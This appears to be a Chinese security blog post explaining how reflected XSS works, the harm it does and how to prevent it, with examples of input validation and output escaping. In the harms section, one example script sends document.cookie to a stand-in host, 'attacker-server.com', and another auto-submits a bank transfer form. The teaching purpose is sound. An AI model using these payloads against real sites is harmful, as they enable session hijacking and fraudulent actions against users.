<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"zifeiyu-sec.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.23.2","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="反射型 XSS：原理、危害与防护解析一、引言在 Web 安全领域，跨站脚本攻击（Cross - Site Scripting，简称 XSS ）是一类常见且危害较大的攻击方式。反射型 XSS 作为 XSS 的主要类型之一，常常潜伏在网站的交互功能中，威胁着用户的数据安全和浏览体验。本文将深入剖析反射型 XSS 的原理、危害，并给出有效的防护策略，帮助大家更好地理解和防范这类攻击。">
<meta property="og:type" content="article">
<meta property="og:title" content="反射性xss">
<meta property="og:url" content="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%B0%84%E6%80%A7xss/index.html">
<meta property="og:site_name" content="子非鱼的博客">
<meta property="og:description" content="反射型 XSS：原理、危害与防护解析一、引言在 Web 安全领域，跨站脚本攻击（Cross - Site Scripting，简称 XSS ）是一类常见且危害较大的攻击方式。反射型 XSS 作为 XSS 的主要类型之一，常常潜伏在网站的交互功能中，威胁着用户的数据安全和浏览体验。本文将深入剖析反射型 XSS 的原理、危害，并给出有效的防护策略，帮助大家更好地理解和防范这类攻击。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-08-06T02:31:47.000Z">
<meta property="article:modified_time" content="2025-08-06T06:38:33.072Z">
<meta property="article:author" content="子非鱼">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="反射性XSS">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%B0%84%E6%80%A7xss/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%B0%84%E6%80%A7xss/","path":"2025/08/06/Web漏洞/XSS漏洞/反射性xss/","title":"反射性xss"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>反射性xss | 子非鱼的博客</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">子非鱼的博客</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">在时间的尺度上，一切问题都有答案</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8B-XSS%EF%BC%9A%E5%8E%9F%E7%90%86%E3%80%81%E5%8D%B1%E5%AE%B3%E4%B8%8E%E9%98%B2%E6%8A%A4%E8%A7%A3%E6%9E%90"><span class="nav-number">1.</span> <span class="nav-text">反射型 XSS：原理、危害与防护解析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%BC%95%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">一、引言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E5%8F%8D%E5%B0%84%E5%9E%8B-XSS-%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.</span> <span class="nav-text">二、反射型 XSS 原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="nav-number">1.2.1.</span> <span class="nav-text">（一）基本概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%BA%8C%EF%BC%89%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E6%8B%86%E8%A7%A3"><span class="nav-number">1.2.2.</span> <span class="nav-text">（二）攻击流程拆解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E5%8F%8D%E5%B0%84%E5%9E%8B-XSS-%E7%9A%84%E5%8D%B1%E5%AE%B3"><span class="nav-number">1.3.</span> <span class="nav-text">三、反射型 XSS 的危害</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E7%AA%83%E5%8F%96%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF"><span class="nav-number">1.3.1.</span> <span class="nav-text">（一）窃取用户敏感信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%BA%8C%EF%BC%89%E4%BC%AA%E9%80%A0%E7%94%A8%E6%88%B7%E6%93%8D%E4%BD%9C"><span class="nav-number">1.3.2.</span> <span class="nav-text">（二）伪造用户操作</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%B8%89%EF%BC%89%E4%BC%A0%E6%92%AD%E6%81%B6%E6%84%8F%E5%86%85%E5%AE%B9"><span class="nav-number">1.3.3.</span> <span class="nav-text">（三）传播恶意内容</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E5%8F%8D%E5%B0%84%E5%9E%8B-XSS-%E7%9A%84%E9%98%B2%E6%8A%A4%E6%8E%AA%E6%96%BD"><span class="nav-number">1.4.</span> <span class="nav-text">四、反射型 XSS 的防护措施</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%B8%80%EF%BC%89%E8%BE%93%E5%85%A5%E9%AA%8C%E8%AF%81%EF%BC%88%E5%89%8D%E7%AB%AF%E4%B8%8E%E5%90%8E%E7%AB%AF%E5%8F%8C%E9%87%8D%E9%AA%8C%E8%AF%81%EF%BC%89"><span class="nav-number">1.4.1.</span> <span class="nav-text">（一）输入验证（前端与后端双重验证）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81"><span class="nav-number">1.4.1.1.</span> <span class="nav-text">前端验证</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8E%E7%AB%AF%E9%AA%8C%E8%AF%81"><span class="nav-number">1.4.1.2.</span> <span class="nav-text">后端验证</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%BA%8C%EF%BC%89%E8%BE%93%E5%87%BA%E7%BC%96%E7%A0%81%EF%BC%88%E5%AF%B9%E5%8A%A8%E6%80%81%E5%86%85%E5%AE%B9%E8%BF%9B%E8%A1%8C%E8%BD%AC%E4%B9%89%EF%BC%89"><span class="nav-number">1.4.2.</span> <span class="nav-text">（二）输出编码（对动态内容进行转义）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EF%BC%88%E4%B8%89%EF%BC%89%E8%AE%BE%E7%BD%AE-HttpOnly-Cookie"><span class="nav-number">1.4.3.</span> <span class="nav-text">（三）设置 HttpOnly Cookie</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E6%80%BB%E7%BB%93"><span class="nav-number">1.5.</span> <span class="nav-text">五、总结</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="子非鱼"
      src="/images/1.png">
  <p class="site-author-name" itemprop="name">子非鱼</p>
  <div class="site-description" itemprop="description">学习过程的记录</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/zifeiyu-sec" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;zifeiyu-sec" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://gitee.com/zifeiyu-sec" title="Gitee → https:&#x2F;&#x2F;gitee.com&#x2F;zifeiyu-sec" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>Gitee</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          链接
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://example.com/" title="https:&#x2F;&#x2F;example.com" rel="noopener" target="_blank">Title</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%B0%84%E6%80%A7xss/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.png">
      <meta itemprop="name" content="子非鱼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="子非鱼的博客">
      <meta itemprop="description" content="学习过程的记录">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="反射性xss | 子非鱼的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          反射性xss
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-08-06 10:31:47 / 修改时间：14:38:33" itemprop="dateCreated datePublished" datetime="2025-08-06T10:31:47+08:00">2025-08-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">Web漏洞</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">XSS漏洞</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="反射型-XSS：原理、危害与防护解析"><a href="#反射型-XSS：原理、危害与防护解析" class="headerlink" title="反射型 XSS：原理、危害与防护解析"></a>反射型 XSS：原理、危害与防护解析</h1><h2 id="一、引言"><a href="#一、引言" class="headerlink" title="一、引言"></a>一、引言</h2><p>在 Web 安全领域，跨站脚本攻击（Cross - Site Scripting，简称 XSS ）是一类常见且危害较大的攻击方式。反射型 XSS 作为 XSS 的主要类型之一，常常潜伏在网站的交互功能中，威胁着用户的数据安全和浏览体验。本文将深入剖析反射型 XSS 的原理、危害，并给出有效的防护策略，帮助大家更好地理解和防范这类攻击。</p>
<span id="more"></span>
<h2 id="二、反射型-XSS-原理"><a href="#二、反射型-XSS-原理" class="headerlink" title="二、反射型 XSS 原理"></a>二、反射型 XSS 原理</h2><h3 id="（一）基本概念"><a href="#（一）基本概念" class="headerlink" title="（一）基本概念"></a>（一）基本概念</h3><p>反射型 XSS，也被称为非持久型 XSS 。它的核心特点是攻击代码（通常是 JavaScript 代码）通过用户与网站的交互，<strong>一次性</strong>地反射到用户的浏览器中执行。</p>
<h3 id="（二）攻击流程拆解"><a href="#（二）攻击流程拆解" class="headerlink" title="（二）攻击流程拆解"></a>（二）攻击流程拆解</h3><ol>
<li><strong>构造恶意请求</strong>：攻击者会精心构造一个包含恶意脚本的 URL 。例如，针对某个网站的搜索功能，如果搜索参数未做安全处理，攻击者可能构造这样的 URL ：<code>http://example.com/search?keyword=&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</code> 。这里的 <code>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</code> 就是恶意 JavaScript 代码。</li>
<li><strong>诱导用户访问</strong>：攻击者通过各种手段诱导受害者点击这个恶意 URL ，比如将其伪装成看似正常的链接，发布在社交平台、邮件或者其他网页中。</li>
<li><strong>服务器反射响应</strong>：当受害者点击该 URL 后，请求会发送到目标网站的服务器。服务器会从请求参数中提取出 “keyword” 的值（也就是恶意脚本），然后将其拼接（如果未做安全处理）到响应页面的 HTML 内容中，再返回给受害者的浏览器。</li>
<li><strong>浏览器执行恶意脚本</strong>：受害者的浏览器接收到包含恶意脚本的响应页面后，会按照正常 HTML 和 JavaScript 的解析方式，执行其中的恶意脚本。这就可能导致诸如弹出恶意警告框、窃取用户 cookie 、伪造用户操作等危害行为。</li>
</ol>
<h2 id="三、反射型-XSS-的危害"><a href="#三、反射型-XSS-的危害" class="headerlink" title="三、反射型 XSS 的危害"></a>三、反射型 XSS 的危害</h2><h3 id="（一）窃取用户敏感信息"><a href="#（一）窃取用户敏感信息" class="headerlink" title="（一）窃取用户敏感信息"></a>（一）窃取用户敏感信息</h3><p>当恶意脚本执行时，它可以获取用户浏览器中的 cookie 信息。cookie 中往往存储着用户的登录凭证、个人偏好设置等敏感数据。例如，攻击者获取到用户的登录 cookie 后，就可以利用这些凭证冒充用户登录目标网站，进而访问用户的个人资料、交易记录等私密信息。以下是一段简单的恶意脚本示例，用于窃取 cookie 并发送到攻击者指定的服务器：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    <span class="comment">// 创建一个 Image 对象，利用其 src 属性发送数据（也可以用 XMLHttpRequest 等方式）</span></span><br><span class="line">    <span class="keyword">var</span> img = <span class="keyword">new</span> <span class="title class_">Image</span>();</span><br><span class="line">    img.<span class="property">src</span> = <span class="string">&quot;http://attacker-server.com/steal?cookie=&quot;</span> + <span class="variable language_">document</span>.<span class="property">cookie</span>;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>当这段脚本在受害者浏览器中执行后，受害者的 cookie 就会被发送到 <code>attacker-server.com</code> ，攻击者就能轻松获取。</p>
<h3 id="（二）伪造用户操作"><a href="#（二）伪造用户操作" class="headerlink" title="（二）伪造用户操作"></a>（二）伪造用户操作</h3><p>恶意脚本能够模拟用户在网页上的操作，比如自动点击链接、提交表单等。假设目标网站存在一个转账功能的表单，攻击者构造的反射型 XSS 脚本可以自动填充转账金额、收款账户等信息并提交，从而实现未经用户授权的转账操作（如果网站的安全验证存在漏洞）。示例代码如下（仅为原理演示，实际场景更复杂）：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    <span class="comment">// 找到转账表单</span></span><br><span class="line">    <span class="keyword">var</span> form = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;transfer-form&#x27;</span>);</span><br><span class="line">    <span class="comment">// 填充恶意数据</span></span><br><span class="line">    <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;amount&#x27;</span>).<span class="property">value</span> = <span class="string">&#x27;10000&#x27;</span>;</span><br><span class="line">    <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;recipient&#x27;</span>).<span class="property">value</span> = <span class="string">&#x27;attacker-account&#x27;</span>;</span><br><span class="line">    <span class="comment">// 提交表单</span></span><br><span class="line">    form.<span class="title function_">submit</span>();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="（三）传播恶意内容"><a href="#（三）传播恶意内容" class="headerlink" title="（三）传播恶意内容"></a>（三）传播恶意内容</h3><p>反射型 XSS 还可能被用于在受害者的社交圈子中传播恶意内容。比如，恶意脚本可以自动获取用户在社交网站的发布权限（如果存在漏洞），然后发布包含更多恶意链接或者虚假信息的内容，进一步扩大攻击范围，影响更多用户。</p>
<h2 id="四、反射型-XSS-的防护措施"><a href="#四、反射型-XSS-的防护措施" class="headerlink" title="四、反射型 XSS 的防护措施"></a>四、反射型 XSS 的防护措施</h2><h3 id="（一）输入验证（前端与后端双重验证）"><a href="#（一）输入验证（前端与后端双重验证）" class="headerlink" title="（一）输入验证（前端与后端双重验证）"></a>（一）输入验证（前端与后端双重验证）</h3><h4 id="前端验证"><a href="#前端验证" class="headerlink" title="前端验证"></a>前端验证</h4><p>在网页的前端代码中，对用户输入的内容进行严格验证。例如，对于一个搜索框的输入，限制用户只能输入特定类型的字符（如字母、数字、部分常用符号等），可以使用 JavaScript 进行正则表达式验证。以下是一个简单的前端输入验证示例，用于验证用户输入是否为合法的搜索关键词（仅允许字母、数字和空格）：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;zh-CN&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>搜索示例<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">id</span>=<span class="string">&quot;search-input&quot;</span> <span class="attr">placeholder</span>=<span class="string">&quot;请输入搜索内容&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">button</span> <span class="attr">onclick</span>=<span class="string">&quot;validateAndSearch()&quot;</span>&gt;</span>搜索<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">validateAndSearch</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> input = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;search-input&#x27;</span>).<span class="property">value</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 正则表达式，仅允许字母、数字和空格</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> regex = <span class="regexp">/^[a-zA-Z0-9\s]*$/</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (regex.<span class="title function_">test</span>(input)) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 验证通过，执行搜索操作（这里可替换为实际的搜索请求逻辑）</span></span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">alert</span>(<span class="string">&#x27;输入合法，将执行搜索：&#x27;</span> + input);</span></span><br><span class="line"><span class="language-javascript">            &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">alert</span>(<span class="string">&#x27;输入包含非法字符，请重新输入！&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>不过，前端验证只是一种辅助手段，因为攻击者可以绕过前端代码（比如直接构造 HTTP 请求），所以必须结合后端验证。</p>
<h4 id="后端验证"><a href="#后端验证" class="headerlink" title="后端验证"></a>后端验证</h4><p>服务器端接收到用户输入后，要再次进行严格验证。对于不同类型的输入，采用合适的验证规则。例如，对于邮箱地址输入，使用正则表达式验证其格式是否正确；对于数字类型的输入，验证是否在合理的取值范围内。以 Node.js（Express 框架）为例，后端验证用户输入的搜索关键词是否合法的示例代码如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">const</span> &#123; check, validationResult &#125; = <span class="built_in">require</span>(<span class="string">&#x27;express-validator&#x27;</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;/search&#x27;</span>, [</span><br><span class="line">    <span class="title function_">check</span>(<span class="string">&#x27;keyword&#x27;</span>).<span class="title function_">matches</span>(<span class="regexp">/^[a-zA-Z0-9\s]*$/</span>).<span class="title function_">withMessage</span>(<span class="string">&#x27;输入包含非法字符&#x27;</span>)</span><br><span class="line">], <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> errors = <span class="title function_">validationResult</span>(req);</span><br><span class="line">    <span class="keyword">if</span> (!errors.<span class="title function_">isEmpty</span>()) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123; <span class="attr">errors</span>: errors.<span class="title function_">array</span>() &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 验证通过，继续处理搜索逻辑</span></span><br><span class="line">    res.<span class="title function_">send</span>(<span class="string">&#x27;搜索内容：&#x27;</span> + req.<span class="property">query</span>.<span class="property">keyword</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="number">3000</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;服务器已启动，端口 3000&#x27;</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<h3 id="（二）输出编码（对动态内容进行转义）"><a href="#（二）输出编码（对动态内容进行转义）" class="headerlink" title="（二）输出编码（对动态内容进行转义）"></a>（二）输出编码（对动态内容进行转义）</h3><p>当需要将用户输入（或者其他动态内容）输出到 HTML 页面中时，要进行严格的编码转义，将特殊字符（如 <code>&lt;</code>、<code>&gt;</code>、<code>&amp;</code> 等）转换为 HTML 实体编码。这样可以确保浏览器将其当作普通文本解析，而不会执行其中的 JavaScript 代码。</p>
<p>在不同的编程语言和模板引擎中，都有相应的编码转义方法：</p>
<ul>
<li><strong>PHP</strong>：可以使用 <code>htmlspecialchars</code> 函数，示例：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$userInput</span> = <span class="string">&quot;&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$userInput</span>, ENT_QUOTES, <span class="string">&#x27;UTF-8&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<ul>
<li><strong>Java（JSP 页面）</strong>：使用 <code>fn:escapeXml</code> 函数（需要引入 JSTL 库），示例：</li>
</ul>
